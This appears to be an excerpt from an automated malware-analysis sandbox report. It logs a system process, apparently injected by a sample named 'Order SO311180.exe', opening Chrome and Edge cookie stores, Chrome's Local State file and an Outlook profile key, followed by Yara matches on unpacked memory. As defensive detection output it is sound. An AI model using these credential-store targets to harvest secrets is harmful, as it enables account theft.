Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY